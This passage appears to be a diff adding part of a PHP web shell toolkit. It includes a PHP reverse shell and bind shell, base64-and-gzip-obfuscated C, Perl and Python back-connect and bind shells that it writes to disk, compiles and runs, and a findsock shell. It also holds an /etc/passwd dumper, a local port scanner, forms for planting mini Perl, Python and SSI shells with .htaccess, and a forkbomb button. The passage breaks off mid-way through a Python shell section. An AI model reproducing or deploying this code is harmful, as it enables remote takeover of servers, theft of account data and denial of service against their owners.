+   $cbdcode.='serv_addr.sin_port = htons('.$_POST["port"].');';
+   $cbdcode.="\n";
+   $cbdcode.=gzinflate(base64_decode('hVJBasMwELznFVsfilRUEgd6cnNOcymF0rNxpbUtImwjKWloyd+7suzGaQjBIHtn2PHMINfK3EpYwaduFHM0KXQCmPN2Jz0QsC2UsvDA4d6h3edhEuD0N7Yl+0M4z2a6hF6A5O5WsOAww4P27DHlGfRk2dot42fkInAOfVfZjtE3DbpqCsPeN+uXjzcB9M4369ebEmMMo53H5hTk6bqxfvGr1gaBpRx+oorBhmSGfNJobHxMmPU0IUQXUmLnb9Q1WRZUXtSe2AlSz//sEJZ3WtEvKipFKxb7sXu0Ax4bGOqYMDEZhVC7bjnqi170DEkvkCV5wgNKw5I53YK5qxORhIPJughRBmetw3EnACfTxwt2dqTnFw=='));
+   //author/license unknown
+   $cbccode=gzinflate(base64_decode('XVBNawIxEL3nVwwrlESjq161BRELUqui25Msy5pku6FrIkksVfG/N7vWj3oYMvPmzZuXqUnFih0X0LeOS93KX1DtBu1taDX7Eu4/roSTPkKpSlwqB5tUKlwmqflkFFieGqj7/HsVE3SsKBnvIevMjjkoNVPOTSIVWKl6iKdioxXu0DbxJC/rI8nSjSz28AyD12Q8HUW3zlYb5/HcaWVx6rTE1apuTO7GywUtWz2eW/qt8jO1E5MeoPVBGH0BqDdXCHXtNzqNe6QSB5RxL3a+Cf7zRWE5G74ly2gxGrxTGM/ni1k0S6LhnICfkBlgzLRSgjmccQr44QpQJ/DkHVN/i4PQ2WOfENJvEziirTBGGxysmjFcBEngvyx+pMPl6U6I77bdaktZXovOfdGtJgQrcBCupQptHtDA5tCUAYXpx2Ti+6zQVnh2+eUT+gU='));
+   // Copyright (C) 2007 pentestmonkey@pentestmonkey.net
+   $findsock=gzinflate(base64_decode('bVLbTsMwDH3vV5gioaR09zdG+QLEG0+ApqxJN4suqZIUcRH/jp11Y0yoUhIfHx87J71EW7e9NnAbPsIkuPrVxPH2Lrv8xaNGdw55tJu/mPKdmqA9ryaAQcr8xXuLJMwY2gg7hRYEn5Tf1CXUW+WLgoM3CV8ZNiA4ARcVLBjoqH9sRP4Y1MbcQINW8+iAHXTOx2eby2Vm3jGKKR2+M9aDgikrolRJ+Gn2sjxNcOEhNacUXbKvI3BOae1XNKEP6l+8ZZynD/hpSIM31wiiy6GFNzsXDTV/Wkxf9txGL7PGeRCNrhZLCm83Juqo1q3heiEZu74+3J+SnTHeqp2hihKuSJ1Wpkr2ZTRjJg1n6+5DHPuVwPavbHRKFGKYHe2KR4dCsso4DPE4pE2WsGDbuGvS23WneoOLiQRVBdPDhPx+khptgziosqeJlHIqOhRHr2Wa18SAmu6a6b6bp4tNT4PZaTBnN1sX2ID0vqZuRT5Zo5307Etewlk0UrQ+PN7fn9HD9sjdH0f4S/xO3/4XA5GP8wH7AQ=='));
+   //code by b374k
+   $pybdcode="#!".search("python",$failflag)."\n";
+   $pybdcode.=gzinflate(base64_decode('jVTbahsxEH3ehf0HVS/WYmdjO+2LWxlCcUioE5fYhUIIZrOrZEU2kpHkXP6+mpF8aZxCX7zS6MycMzfLp5U2jmjbI/YNfnT1KFyPOPkksvTy9PdyOrnig/7wc5bOzyfTKafHd1Id24YcVTRLFxeXk+Xs14IPhv1+lv6cXS849fbz2TwcanFPbCPallVPdT7K0sQ2S712XNtipVdCMQzb7RDa6XpIt0M7eWFEWbdSCcty76GiC8RL7rUhkkhFTKkeBGt9hPCcY/QNuMvD90beeqsRbm0UiW9BVVk5qRWrtFLo+dLIVpCFWQuMA/bCClUzOh6PCQUhiTNv+JisvFSOECOqZxYLhRjxWomVizAjlSMUqul5KdqiFiBCeGsDYQIhacB8kCQw5keDkCSCuxxsIcEkkfcEAnA6qisaQe+oPNcOZet3qLPSK4mwjSSICuTAPe5HWwK92PU0Gnf1gl5kaWkenrmfqQIOWRoDwSX/djIi3isWRxijzVfIG9DiVTo28P6oFeA3g1uv9+gO5eKAoXV4e4gxlJSq3hGNTw59EhxNvJ5gCJ8r2bIi1sticMhRth9U345Hln/iWIGtyr5/h33hYWmK8GHxdnq2vLiaLDYrVcxn338s54vryell9PPVcnEy2GaPAuVB2gj3e1cz1ml1VbaNtq7TI6gy3wBaaZ1PHXSZteKh7WGs/R3ivC/XaDPUqLKAHorKMcKgSDE82Z9qsj/WIIKslV/WqinvWhFmF1IqbCvEin3JtxMOCnhcOeCCl+2cgYIEN7FX1rXJsaJFWQEl+6+l2iMdfEyKe35QAl9eEia3Wbtavyg2PFBGYrPgr4D+VYx/sAb8fsA/'));
+   //code by ont.rif
+   $pyintserver="#!".search("python",$failflag)."\n";
+   $pyintserver.="import sys, socket, os, pty, fcntl, struct, termios, select, resource\n";
+   $pyintserver.="host = \"".$_POST["ip"]."\"\n";
+   $pyintserver.="port = ".$_POST["port"]."\n";
+   $pyintserver.=gzinflate(base64_decode('hVT9i+IwEP29f8XcgjSFXlfXdT+EPVg8lyvnKqzCwalIL41rsCYliav+9zfpl9VdsNjGJm9m3ry81KhD1wEt6RqesoGZIB9I+fr8sgiH/Ylfvo9Hvd+L8eSt//wKXh4bUCkEoxhDVlIbH1KpjIerbE9ZarBCqrgwcAW9SLgGCvi3mbhyQOpgwfYcg1sYYTJCfGmnl1KtiQc/oNmtoZq26iVAXhhG475SUvnA7FDxcMFGdqERA2lobyZcaADJQQE+hSwiAm1U9gdTYoF4m97kugRLnjAhiYeyHDTCYi6qObiMlltzhF9EI4U6uhSzoWcKnxnqgynNpXBSHvtAVzyJF8sY9zQ1h0ImBzUT0gAiuuBALjRMwlFv/Cccjv8i+J2ZyBhFDFMbLrUP7nHZ9eH7Tev27vHmsXPXwi2we1CPfgJcfmi27+/bnYFNfZq7Foxr2trNqC01QRrRNXF/4YUlbps+POBtf7bGkgqTBFxSk5CvtPNrRVAua43Kc5BGWjuwifa5FIppuVWUBdimSvgGvVJNvQ3C13CyGI5ewkHfmzbnjrUIcOACVCTeGYG2X6bybPJCP+s7mkjNgHBL+NR4GSKngTi2Z/SDgHv9j4trvcJ2p647R8473C8GE7VlGIBu3aH9rEAswVMS5AOBabWv/qlPYI6ZirtTnI7KAraBOl9sGVMjG8WimNRStpr2suFZUzvFDftkSBt9bDNvL3fjT44SZNnA8A0D3CUP7VlkOzu7p/RLimfUzkq3SnZHckfyJa/C4/j6iRvb4FkoPmJfM/sP'));
+   switch ($_POST["shellz"]) {
+    case "phpremote":
+    // code by pentestmonkey.net. license: GPLv2
+     $ip=($_POST["ip"]);
+     $port=($_POST["port"]);
+     $chunk_size=1400;
+     $write_a=null;
+     $error_a=null;
+     $shell='/bin/sh -i';
+     $daemon = 0;
+     function printit ($string) { if (!$daemon) { print "$string\n"; }}
+     if (function_exists('pcntl_fork')) {
+      $pid = pcntl_fork();
+      if ($pid == -1) { printit("ERROR: Can't fork<br>"); exit(1); }
+      if ($pid) { exit(0); }
+      if (posix_setsid() == -1) { printit("Error: Can't setsid()<br>"); exit(1); }
+      $daemon = 1;
+     } else { printit("WARNING: Failed to daemonise!<br>"); }
+     umask(0);
+     $sock = fsockopen($ip, $port, $errno, $errstr, 30);
+     if (!$sock) { printit("$errstr ($errno)"); exit(1); }
+     $process = proc_open($shell, $descriptorspec, $pipes);
+     if (!is_resource($process)) { printit("ERROR: Can't spawn shell<br>"); exit(1); }
+     stream_set_blocking($pipes[0], 0);
+     stream_set_blocking($pipes[1], 0);
+     stream_set_blocking($pipes[2], 0);
+     stream_set_blocking($sock, 0);
+     printit("Successfully opened reverse shell to $ip:$port<br>");
+     while (1) {
+      if (feof($sock)) { printit("ERROR: Shell connection terminated<br>");     break; }
+      if (feof($pipes[1])) { printit("ERROR: Shell process terminated<br>"); break;     }
+      $read_a = array($sock, $pipes[1], $pipes[2]);
+      $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
+      if (in_array($sock, $read_a)) {
+       $input = fread($sock, $chunk_size);
+       fwrite($pipes[0], $input);
+      }
+      if (in_array($pipes[1], $read_a)) {
+       $input = fread($pipes[1], $chunk_size);
+       fwrite($sock, $input);
+      }
+      if (in_array($pipes[2], $read_a)) {
+       $input = fread($pipes[2], $chunk_size);
+       fwrite($sock, $input);
+      }
+     }
+     fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);@proc_close($process);
+    //php backconnect end
+    break;
+    case "phplocal":
+     // code by metasploit.com. license unknown, assuming BSD
+     $port=$_POST["port"]; 
+     $scl='socket_create_listen';
+     if (function_enabled($scl)) {
+      $sock=@$scl($port); 
+     } else { 
+      $sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
+      $ret=@socket_bind($sock,0,$port);
+     $ret=@socket_listen($sock,5); 
+     }
+     $msgsock=@socket_accept($sock);
+     @socket_close($sock);
+     while (FALSE !== @socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL)) {
+      $buffer = '';
+      $c=@socket_read($msgsock,2048,PHP_NORMAL_READ);
+      if (FALSE === $c) { break; }
+      if (substr($c,0,3) == 'cd ') {
+       chdir(substr($c,3,-1));
+      } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
+       break;
+      } else {
+       if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { $c=$c." 2>&1\n"; }
+       if (function_enabled('shell_exec')) {
+        $buffer=shell_exec($c);
+       } else if(function_enabled('passthru')) {
+        ob_start();
+        passthru($c);
+        $buffer=ob_get_contents();
+        ob_end_clean();
+       } else if(function_enabled('system')) {
+        ob_start();
+        system($c);
+        $buffer=ob_get_contents();
+        ob_end_clean();
+       } else if(function_enabled('exec')) {
+        $buffer=array();
+        exec($c,$buffer);
+        $buffer=join(chr(10),$buffer).chr(10);
+       } else if(function_enabled('proc_open')) {
+        $handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);
+        $buffer=NULL;
+        while (!feof($pipes[1])) {
+         $buffer.=fread($pipes[1],1024);
+        }
+       @proc_close($handle);     
+       } else if(function_enabled('popen')) {
+        $fp=popen($c,'r');
+        $buffer=NULL;
+        if (is_resource($fp)) { 
+         while (!feof($fp)) {
+          $buffer.=fread($fp,1024);
+         }
+        }
+        @pclose($fp);
+       }
+      else { $buffer=0; }
+      }
+      @socket_write($msgsock,$buffer,strlen($buffer));
+     }
+     @socket_close($msgsock);
+     echo "<br><br><font color=\"green\">phplocal done</font>"; 
+    break;
+    //phpbind end
+    case "perllocal":
+     $exec_path = trim($_POST['path']);
+     ob_start();
+     @sploent516();
+     ob_end_clean();
+     $fh=fopen($exec_path,'w');
+     if (!$fh) { echo "<br><br><font color=\"red\">can`t fopen!</font>"; }
+     else { 
+      fwrite($fh,$perlbdcode);
+      fclose($fh);
+      chmod($exec_path,0644);
+      $c=search("perl",$failflag).' '.$exec_path.' && rm -f '.$exec_path.'';
+      run($c);
+      echo "<br><br><font color=\"green\">perllocal done</font>";
+     }
+    //perl bind end
+    break;
+    case "perlremote":
+     $exec_path=trim($_POST['path']);
+     ob_start();
+     @sploent516();
+     ob_end_clean();
+     $fh=fopen($exec_path,'w');
+     if (!$fh) { echo "<br><br><font color=\"red\">can`t fopen!</font>"; }
+     else {
+      fwrite($fh,$perlbccode);
+      fclose($fh);
+      chmod($exec_path,0644);
+      $c=search("perl",$failflag).' '.$exec_path.' '.$_POST["ip"].' '.$_POST["port"].' && rm -f '.$exec_path.'';
+      run($c);
+      echo "<br><br><font color=\"green\">perlremote done</font>";
+     }
+    break;
+    //perl backconnect end
+    case "pylocal":
+     $exec_path = trim($_POST['path']);
+     ob_start();
+     @sploent516();
+     ob_end_clean();
+     $fh=fopen($exec_path,'w');
+     if (!$fh) { echo "<br><br><font color=\"red\">can`t fopen!</font>"; }
+     else { 
+      fwrite($fh,$pybdcode);
+      fclose($fh);
+      chmod($exec_path,0644);
+      $c=search("python",$failflag).' '.$exec_path.' -b '.$_POST["port"].' && rm -f '.$exec_path.'';
+      run($c);
+      echo "<br><br><font color=\"green\">pylocal done</font>";
+     }
+    //python bind end
+    case "pyremote":
+     $exec_path=trim($_POST['path']);
+     ob_start();
+     @sploent516();
+     ob_end_clean();
+     $fh=fopen($exec_path,'w');
+     if (!$fh) { echo "<br><br><font color=\"red\">can`t fopen!</font>"; }
+     else {
+      fwrite($fh,$pybdcode);
+      fclose($fh);
+      chmod($exec_path,0644);
+      $c=search("python",$failflag).' '.$exec_path.' -r '.$_POST["port"].' '.$_POST["ip"].' && rm -f '.$exec_path.'';
+      run($c);
+      echo "<br><br><font color=\"green\">pyremote done</font>";
+     }
+    break;
+    //python backconnect end
+    case "pyint":
+     $exec_path=trim($_POST['path']);
+     ob_start();
+     @sploent516();
+     ob_end_clean();
+     $fh=fopen($exec_path,'w');
+     if (!$fh) { echo "<br><br><font color=\"red\">can`t fopen!</font>"; }
+     else {
+      fwrite($fh,$pyintserver);
+      fclose($fh);
+      chmod($exec_path,0644);
+      $c=search("python",$failflag).' '.$exec_path.' && rm -f '.$exec_path.'';
+      run($c);
+      echo "<br><br><font color=\"green\">pyint done</font>";
+     }
+    break;
+    //python interactive end
+    case "clocal":
+     $exec_path=trim($_POST['path']);
+     ob_start();
+     @sploent516();
+     ob_end_clean();
+     $fh=fopen($exec_path,"w");
+     if (!$fh) { echo "<br><br><font color=\"red\">can`t fopen!</font>"; } 
+     else {
+      fwrite($fh,$cbdcode);
+      fclose($fh);
+      $c=search("gcc",$failflag)." -w ".$exec_path." -o ".$exec_path." && ".$exec_path." ".$_POST["port"]." | rm -f ".$exec_path."";
+      run($c);
+      echo "<br><br><font color=\"green\">clocal done</font>";
+     }
+    break;
+    //C bind end
+    case "cremote":
+     $exec_path=trim($_POST['path']);
+     ob_start();
+     @sploent516();
+     ob_end_clean();
+     $fh=fopen($exec_path,"w");
+     if (!$fh) { echo "<br><br><font color=\"red\">can`t fopen!</font>"; }
+     else {
+      fwrite($fh,$cbccode);
+      fclose($fh);
+      $c=search("gcc",$failflag)." ".$exec_path." -o ".$exec_path." && ".$exec_path." ".$_POST["ip"]." ".$_POST["port"]." | rm -f ".$exec_path."";
+      run($c);
+     }
+    break;
+    case "findsock":
+     $fs_path=trim($_POST['path']);
+     ob_start();
+     @sploent516();
+     ob_end_clean();
+     $fh=fopen($fs_path.".c","w");
+     if (!$fh) { echo "<br><br><font color=\"red\">can`t fopen!</font>"; }
+     else {
+      fwrite($fh,$findsock);
+      fclose($fh);
+      $c=search("gcc",$failflag)." ".$fs_path.".c -o ".$fs_path." && rm -f ".$fs_path.".c";
+      run($c);
+      echo "<br>compiled, now connect to shell via nc and request ?pfs&amp;path=".$fs_path."<br>";
+     }
+    break;
+   }
+  }
+  echo $pageend;
+  break;
+// --------------------------------------------- bind end; extras 
+ case "e":
+  if (empty($_POST["extraz"]) and $download != "1") {
+   echo $title; 
+   echo '<font color="blue">---> SysInfo</font><br>';
+   echo '<br><a href="#" onclick="showTooltip(6)" id="link5"> &gt;&gt; show &lt;&lt; </a>
+   <div id="6" style="background-color: #bbbbbb; color: #000000; position: absolute; border: 1px solid #FF0000; display: none">';
+   echo 'SERVER_ADDR: '.getenv('SERVER_ADDR').'<br>';
+   echo 'REMOTE_ADDR: '.getenv('REMOTE_ADDR').'<br>';
+   echo 'HTTP_X_FORWARDED_FOR: '.getenv('HTTP_X_FORWARDED_FOR').'<br>';
+   echo 'HTTP_PROXY_CONNECTION: '.getenv('HTTP_PROXY_CONNECTION').'<br>';
+   echo 'HTTP_VIA: '.getenv('HTTP_VIA').'<br>';
+   echo 'HTTP_USER_AGENT: '.getenv('HTTP_USER_AGENT').'<br>';
+   echo 'SERVER_SOFTWARE: '.getenv("SERVER_SOFTWARE").'<br>';
+   echo "php API: ".php_sapi_name()."<br>";
+   echo "php version: ".version()." (full: ".phpversion().")<br>";
+   echo 'disable_functions: '.ini_get('disable_functions').'<br>';
+   sploent516();
+   echo "<br>";
+   echo "current dir: ".getcwd()."<br>"; 
+   if (function_enabled('php_uname')) {
+    echo "php_uname: ".wordwrap(php_uname(),90,"<br>",1)."<br>";
+   }
+   if (function_enabled('posix_uname')) {
+    echo "posix_uname: ";
+    foreach(posix_uname() AS $key=>$value) {
+     print $value." ";
+    }
+    echo "<br>";
+   }
+   echo "script owner: ";
+   if (function_enabled('get_current_user')) {
+    echo get_current_user();
+   } else {
+    echo "get_current_user() disabled!";
+   }
+   if (function_enabled('getmyuid')) {
+    echo " || uid: ".getmyuid().",";
+   } else {
+    echo " getmyuid() disabled,";
+   }
+   if (function_enabled('getmygid')) {
+    echo " gid: ".getmygid();
+   } else {
+    echo " getmygid disabled";
+   }
+   if (extension_loaded('posix')) {
+    echo "<br>current user:";
+    if (function_enabled('posix_getuid')) {
+     if (function_enabled('posix_getpwuid')) { 
+      $processUser = posix_getpwuid(posix_getuid());
+      echo $processUser['name'];
+     } else {
+      echo " posix_getpwuid() disabled!";
+     }
+     echo " || uid: ".posix_getuid().",";
+     if (function_enabled('posix_getgid')) {
+      echo " gid: ".posix_getgid();
+     } else {
+      echo " posix_getgid() disabled";
+     }
+    } else {
+     echo " posix_getuid() disabled!";
+    }
+    echo "<br>effective user:";
+    if (function_enabled('posix_geteuid')) {
+     if (function_enabled('posix_getpwuid')) { 
+      $processUser = posix_getpwuid(posix_getuid());
+      echo $processUser['name'];
+     } else {
+      echo " posix_getpwuid() disabled!";
+     }
+     echo " || euid: ".posix_geteuid();
+     if (function_enabled('posix_getegid')) {
+      echo " egid: ".posix_getegid();
+     } else {
+      echo ", posix_getegid() disabled";
+     }
+    } else {
+     echo " posix_geteuid() disabled!";
+    }
+   } else {
+    echo "<br>posix.so not loaded, can't get user information";
+   }
+   echo "</div><br><br>";
+   echo '<font color="blue">---> Extraz</font><br><br>';
+   if (!function_enabled('phpinfo')) { echo "fail, phpinfo() is disabled<br><br>"; 
+   } else {
+    echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'"><input name="p" type="hidden" value="pi"><input type="submit" value="phpinfo()"></form><br>';
+   }
+   if(function_enabled('posix_getpwuid')) {
+    echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">"read" /etc/passwd from uid <input name="uid1" type="text" size="10" value="0"> to <input name="uid2" type="text" size="10" value="1000"> <input type="submit" value="go"><input name="uidz" type="hidden" value="done"></form><input name="p" type="hidden" value="e">';
+    if (!empty($_POST["uidz"])) {
+     echo "<br>";
+     //code by oRb
+     for(;$_POST['uid1'] <= $_POST['uid2'];$_POST['uid1']++) {
+      $uid = @posix_getpwuid($_POST['uid1']);
+      if ($uid)
+       echo join(':',$uid)."<br>\n";
+     }
+    }
+   }
+   echo "<br>";
+   if(function_enabled('fsockopen')) {
+    echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">"scan" local open ports from <input name="port1" type="text" size="5" maxlength="5" value="1"> to <input name="port2" type="text" size="5" maxlength="5" value="1337"> <input type="submit" value="go"><input name="portz" type="hidden" value="done"><input name="p" type="hidden" value="e"></form>';
+    if (!empty($_POST["portz"])) {
+     for($i=$_POST["port1"]; $i <= $_POST["port2"]; $i++)
+     {
+      $fp=@fsockopen("127.0.0.1", $i, $errno, $errstr, 1);
+      if ($fp) {
+       echo "-> ".$i."<br>";
+       fclose($fp);
+      }
+     }
+    }
+   }
+   echo '<br><a href="#" onclick="showTooltip(5)" id="link5"> &gt;&gt; minishells help &lt;&lt; </a>
+   <div id="5" style="background-color: #bbbbbb; color: #000000; position: absolute; border: 1px solid #FF0000; display: none">';
+   echo 'sometimes CGI and SSI are not disabled globally on the server, so you could use CGI or SSI shell. but to enable CGI/SSI you need to use special .htaccess files.<br>CGI:<br><textarea cols="44" rows="2">'.$htaccesses['cgi'].'</textarea><br><br>SSI:<br><textarea cols="44" rows="4">'.$htaccesses["ssi"].'</textarea><br><br><b>warning:</b> using custom .htaccess could break this site! (it could result in error 500). <br>it is recommended to create new dir and place custom .htaccess and minishells there.<br><br>//thanks to profexer for SSI shell and to Michael Foord for python shell</div>';
+   if (file_exists(".htaccess")) {
+    echo '<br>WARNING: my .htaccess will <b>rewrite</b> current one!';
+   }
+   echo '<br><form method="post" action="'.$_SERVER['PHP_SELF'].'">put mini perl shell into <input name="dir" type="text" maxlength="500" size="10" value="."><font color="green">/</font><input name="file" type="text" maxlength="500" size="10" value="sh.pl"> adding .htaccess <input type="checkbox" name="htaccess"> <input type="submit" value="OK"><input name="extraz" type="hidden" value="perlsh"><input name="p" type="hidden" value="e"> ';
+   if (is_writable("./")) {
+    echo "<font color=\"green\">(./ writable)</font>";
+   } else {
+    echo "<font color=\"red\">(./ readonly)</font>";
+   }
+   echo '</form>';
+   if ($failflag=="1") {
+    echo "can't find perl binary (all system functions disabled) assuming /usr/bin/perl<br>";
+   }
+   echo '<br><form method="post" action="'.$_SERVER['PHP_SELF'].'">put mini python shell into <input name="dir" type="text" maxlength="500" size="10" value="."><font color="green">/</font><input name="file" type="text" maxlength="500" size="10" value="sh.py"> adding .htaccess <input type="checkbox" name="htaccess"> <input type="submit" value="OK"><input name="extraz" type="hidden" value="pysh"><input name="p" type="hidden" value="e"> ';
+   if (is_writable("./")) {
+    echo "<font color=\"green\">(./ writable)</font>";
+   } else {
+    echo "<font color=\"red\">(./ readonly)</font>";
+   }
+   echo '</form>';
+   if ($failflag=="1") {
+    echo "can't find python binary (all system functions disabled) assuming /usr/bin/python<br>";
+   }
+   echo '<br><form method="post" action="'.$_SERVER['PHP_SELF'].'">put mini SSI shell into <input name="dir" type="text" maxlength="500" size="10" value="."><font color="green">/</font><input name="file" type="text" maxlength="500" size="10" value="index.shtml"> adding .htaccess <input type="checkbox" name="htaccess"> <input type="submit" value="OK"><input name="extraz" type="hidden" value="ssish"><input name="p" type="hidden" value="e"> ';
+   if (is_writable("./")) {
+    echo "<font color=\"green\">(./ writable)</font>";
+   } else {
+    echo "<font color=\"red\">(./ readonly)</font>";
+   }
+   echo '</form>';
+   echo '<br>';
+   //code by Eric A. Meyer, license CC BY-SA
+   echo '<script type="text/javascript">function encode() { var obj = document.getElementById("dencoder"); var unencoded = obj.value; obj.value = encodeURIComponent(unencoded); } function decode() { var obj = document.getElementById("dencoder"); var encoded = obj.value; obj.value = decodeURIComponent(encoded.replace(/\+/g,  " ")); } </script>';
+   echo "<font color='blue'>---> Text encoderz/decoderz</font><br><br>";
+   echo "fast URL-encoder:<br>";
+   echo '<form onsubmit="return false;" action="javascript;"><textarea cols="80" rows="4" id="dencoder"></textarea><div><input type="button" onclick="decode()" value="Decode"> <input type="button" onclick="encode()" value="Encode"></div></form>';
+   echo "<br>other encoders: ";
+   $cryptform="<form action=\"".$_SERVER['PHP_SELF']."\" method=\"post\">
+   <input name=\"p\" type=\"hidden\" value=\"e\">
+   <textarea name=\"text\" cols=\"80\" rows=\"4\">";
+   if(isset($_POST["text"])) { 
+    $cryptform.=$_POST["text"];
+    $hash=$_POST['hash'];
+    $hash1=$_POST['hash1'];
+    $hash2=$_POST['hash2'];
+   } else {
+    $hash=genSalt('zxcv',8);
+    $hash1=genSalt('zxcv',8);
+    $hash2=genSalt('zxcv',6,1);
+   }
+   $cryptform.="</textarea><br>
+   <select name=\"cryptmethod\"> 
+   <option value=\"asc2hex\"".($_POST["cryptmethod"] == "asc2hex"?" selected":"").">ASCII to Hex</option> 
+   <option value=\"hex2asc\"".($_POST["cryptmethod"] == "hex2asc"?" selected":"").">Hex to ASCII</option> 
+   <option value=\"b64enc\"".($_POST["cryptmethod"] == "b64enc"?" selected":"").">Base64 Encode</option> 
+   <option value=\"b64dec\"".($_POST["cryptmethod"] == "b64dec"?" selected":"").">Base64 Decode</option> 
+   <option value=\"crypt\"".($_POST["cryptmethod"] == "crypt"?" selected":"").">DES</option> 
+   <option value=\"entityenc\"".($_POST["cryptmethod"] == "entityenc"?" selected":"").">HTML Entities Encode</option> 
+   <option value=\"entitydec\"".($_POST["cryptmethod"] == "entitydec"?" selected":"").">HTML Entities Decode</option> 
+   <option value=\"md5\"".($_POST["cryptmethod"] == "md5"?" selected":"").">MD5</option>
+   <option value=\"md5md5\"".($_POST["cryptmethod"] == "md5md5"?" selected":"").">MD5(MD5)</option>
+   <option value=\"md5unix\"".($_POST["cryptmethod"] == "md5unix"?" selected":"").">MD5(Unix - \$1\$)</option>
+   <option value=\"md5wp\"".($_POST["cryptmethod"] == "md5wp"?" selected":"").">MD5(WordPress - \$P\$B)</option>
+   <option value=\"md5bb\"".($_POST["cryptmethod"] == "md5bb"?" selected":"").">MD5(PHPBB3 - \$H\$9)</option>
+   <option value=\"md5apr\"".($_POST["cryptmethod"] == "md5apr"?" selected":"").">MD5(APR1 - \$apr1\$)</option>
+   <option value=\"blowfish\"".($_POST["cryptmethod"] == "blowfish"?" selected":"").">Blowfish - \$2a\$</option>
+   <option value=\"sha1\"".($_POST["cryptmethod"] == "sha1"?" selected":"").">SHA1</option>
+   <option value=\"sha256\"".($_POST["cryptmethod"] == "sha256"?" selected":"").">SHA256 - \$5\$</option>
+   <option value=\"sha512\"".($_POST["cryptmethod"] == "sha512"?" selected":"").">SHA512 - \$6\$</option>
+   <option value=\"mysql4\"".($_POST["cryptmethod"] == "mysql4"?" selected":"").">MySQL4</option>
+   <option value=\"mysql5\"".($_POST["cryptmethod"] == "mysql5"?" selected":"").">MySQL5</option>
+   </select> salt: <input type=\"text\" name=\"hash\" size=\"9\" maxlength=\"8\" value=\"".$hash."\"> <input type=\"text\" name=\"hash1\" size=\"9\" maxlength=\"8\" value=\"".$hash1."\"> <input type=\"text\" name=\"hash2\" size=\"7\" maxlength=\"6\" value=\"".$hash2."\"> <font color=\"gray\">(salt needed for: md5(unix,wordpress,phpbb3,apr1) - 8 symbols, sha(256,512) - 16 symbols, and blowfish - 22 symbols. ignore these fields if you use other algorithms)</font><br>
+   <input type=\"submit\" name=\"crypt\" value=\"go\"> 
+   </form>";
+   echo $cryptform;
+   if(isset($_POST['crypt'])) {
+    $text=$_POST['text'];
+    if($text == '') {
+     die("<p>empty form</p>\n".$pageend."");
+    }
+    $hash=$_POST['hash'];
+    $hash1=$_POST['hash1'];
+    $hash2=$_POST['hash2'];
+    echo("--><br><textarea cols=\"80\" rows=\"4\">");
+    switch ($_POST['cryptmethod']) {
+    case "asc2hex":
+     $text=asc2hex($text);
+     break;
+    case "hex2asc":
+     $text=hex2asc($text);
+     break;
+    case 'b64enc':
+     $text=base64_encode($text);
+     break;
+    case 'b64dec':
+     $text=base64_decode($text);
+     break;
+    case 'crypt':
+     $text=crypt($text,'CRYPT_STD_DES');
+     break;
+    case 'entityenc':
+     $text=entityenc($text);
+     break;
+    case 'entitydec':
+     $text=entitydec($text);
+     break;
+    case 'md5':
+     $text=md5($text);
+     break;
+    case 'md5md5':
+     $text=md5(md5($text));
+     break;
+    case 'md5unix':
+     $text=unap($text,$hash,'$1$');
+     break;
+    case 'md5wp':
+     $text=phpass($text,$hash,8192,'$P$B');
+     break;
+    case 'md5bb':
+     $text=phpass($text,$hash,2048,'$H$9');
+     break;
+    case 'md5apr':
+     $text=unap($text,$hash,'$apr1$');
+     break;
+    case 'sha1':
+     $text=sha1($text);
+     break;
+    case 'sha256':
+     $text=crypt($text,'$5$'.$hash.$hash1);
+     break;
+    case 'sha512':
+     $text=crypt($text,'$6$'.$hash.$hash1);
+     break;
+    case 'blowfish':
+     $text=crypt($text,'$2a$07$'.$hash.$hash1.$hash2);
+     break;
+    case 'mysql4':
+     $text=mysql4($text);
+     break;
+    case 'mysql5':
+     $text='*'.strtoupper(sha1(sha1($text,TRUE)));
+     break;
+    }
+    $text=htmlentities($text);
+    echo("$text</textarea><br>");
+   }
+   //decoders end
+   echo '<br><br><font color="blue">---> DoS</font><font color="gray"> //use this carefully</font><br><br>';
+   echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'"><input name="p" type="hidden" value="e"><input name="extraz" type="hidden" value="fork"><input type="submit" value="forkbomb"></form>';
+   echo $pageend;
+  }
+  if (!empty($_POST["extraz"])) {
+   switch ($_POST["extraz"]) {
+    case "fork":
+     while(pcntl_fork()|1); 
+     break;
+    case "pysh":
+     //code by Michael Foord & 12309, license WTFPL 
+     if ($failflag=="1") {
+      $pybin="/usr/bin/python";
+     } else {
+      $pybin=search("python",$failflag);
+     }
+     $pyshcode='#!'.$pybin;
+     $pyshcode.="\n";
